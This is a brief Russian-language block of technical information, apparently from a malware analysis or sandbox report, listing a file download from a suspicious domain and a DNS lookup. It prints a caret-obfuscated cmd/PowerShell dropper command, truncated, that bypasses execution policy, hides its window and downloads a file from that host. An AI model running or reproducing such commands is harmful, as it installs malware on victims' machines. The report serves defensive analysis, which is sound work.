Техническая информация
- http://rootaleyz.top/read.php?f=1.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^ER^s^HE^L^L.exE^ -^EX^EC^u^TI^ONPo^l^I^cy b^YpA^ss^ ^-^N^oproF^Ile ^-Wi^NDowst^yLe hI^d^deN (nEw-^ObjE^C^T^ s^YStE^m.^n^Et.wEbcLiE^nt)^.d^oW^N^lOADf^il^e(^'http://roo...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "pOW^ER^s^HE^L^L.exE^ -^EX^EC^u^TI^ONPo^l^I^cy b^YpA^ss^ ^-^N^oproF^Ile ^-Wi^NDowst^yLe hI^d^deN (nEw-^ObjE^C^T^ s^YStE^m.^n^Et.wEbcLiE^nt)^.d^oW^N^lOADf^il^e(^'http://roo...' (со скрытым окном)